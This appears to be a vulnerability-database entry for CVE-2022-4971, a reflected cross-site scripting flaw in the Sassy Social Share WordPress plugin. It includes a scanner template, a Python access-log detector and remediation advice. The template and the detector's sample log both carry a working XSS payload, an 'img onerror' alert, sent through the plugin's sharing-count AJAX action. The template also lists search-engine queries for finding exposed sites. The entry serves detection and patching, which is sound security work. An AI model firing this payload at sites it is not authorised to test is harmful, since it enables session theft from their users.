Sassy Social Share <= 3.3.3 - Cross-Site Scripting

CVE-2022-4971
Verified

Description

The Sassy Social Share plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'urls' parameter called via the 'heateor_sss_sharing_count' AJAX action in versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

Severity

Medium

CVSS Score

6.1

Exploit Probability

10%

Affected Product

sassy_social_share

Published Date

September 8, 2025

Template Author

popcorn94

CVE-2022-4971.yaml
id: CVE-2022-4971

info:
  name: Sassy Social Share <= 3.3.3 - Cross-Site Scripting
  author: popcorn94
  severity: medium
  description: |
    The Sassy Social Share plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'urls' parameter called via the 'heateor_sss_sharing_count' AJAX action in versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the urls parameter in the sharing count AJAX action, potentially stealing WordPress user sessions and performing actions on behalf of authenticated users.
  remediation: |
    Update Sassy Social Share plugin to a version newer than 3.3.3 that properly sanitizes the urls parameter and encodes output in the AJAX action.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/85277960-2bba-4cd7-9f4c-e04f6743b96c?source=cve
    - https://wpscan.com/vulnerability/4631519b-2060-43a0-b69b-b3d7ed94c705/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4971
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-4971
    cwe-id: CWE-79
    epss-score: 0.10126
    epss-percentile: 0.93291
    cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: heateor
    product: sassy_social_share
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/sassy-social-share"
    fofa-query: body=/wp-content/plugins/sassy-social-share/
    publicwww-query: /wp-content/plugins/sassy-social-share/
    google-query: inurl:"/wp-content/plugins/sassy-social-share"
  tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,sassy-social-share,xss,authenticated,vkev,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[<img%20src%3dx%20onerror%3dalert(document.domain)>]= HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_2, "facebook_urls\":", "<img src=x onerror=alert(document.domain)>")'
          - 'contains(content_type_2, "text/html")'
          - 'status_code_2 == 200'
        condition: and
# digest: 490a00463044022054c549e1431dd6462233d47dff6d3f1605abd49bb6e9b50eb32560744d6ef7e5022057f5e8be8d4bc450490141b80047e906884613eb1e2bb46989125ed793c5a1ba:922c64590222798bb761d5b6d8e72950
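
The second request in the template puts its markup in the array key of `urls` (`urls[...]=`) and leaves the value empty, so a log check has to decode and inspect parameter names as well as values. The Python check below is an added example, not part of the template or the plugin; the function names and the log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Characters not expected in a list of share URLs but required for HTML markup.
MARKUP = re.compile(r'[<>"]')

# Constructed sample lines (documentation IP ranges, example.org URL).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Sep/2025:10:00:01 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heateor_sss_sharing_count&urls[]=https://example.org/post/ HTTP/1.1" 200 181',
    '203.0.113.7 - - [08/Sep/2025:10:00:05 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heateor_sss_sharing_count'
    '&urls[<img%20src%3dx%20onerror%3dalert(document.domain)>]= HTTP/1.1" 200 412',
    '203.0.113.7 - - [08/Sep/2025:10:00:09 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heateor_sss_sharing_count&urls%5B%3Cb%3E%5D= HTTP/1.1" 200 390',
]

def suspicious_sharing_count(log_line):
    """Return the decoded offending 'urls' parameter, or None if the line is clean."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    parts = urlsplit(match.group(1))
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    # parse_qsl percent-decodes both names and values; keep blank values
    # because the template's request sends 'urls[...]=' with nothing after '='.
    params = parse_qsl(parts.query, keep_blank_values=True)
    if ("action", "heateor_sss_sharing_count") not in params:
        return None
    for name, value in params:
        if name.startswith("urls") and (MARKUP.search(name) or MARKUP.search(value)):
            return f"{name}={value}"
    return None

def scan(lines):
    """Return every flagged parameter found in an iterable of log lines."""
    return [hit for hit in map(suspicious_sharing_count, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("flagged:", hit)
```
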

CVSS Metrics

Score: 6.1
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID: CVE-2022-4971
CWE ID: CWE-79

References

https://www.wordfence.com/threat-intel/vulnerabilities/id/85277960-2bba-4cd7-9f4c-e04f6743b96c?source=cve
https://wpscan.com/vulnerability/4631519b-2060-43a0-b69b-b3d7ed94c705/
https://nvd.nist.gov/vuln/detail/CVE-2022-4971

Remediation Steps

Update Sassy Social Share plugin to a version newer than 3.3.3 that properly sanitizes the urls parameter and encodes output in the AJAX action.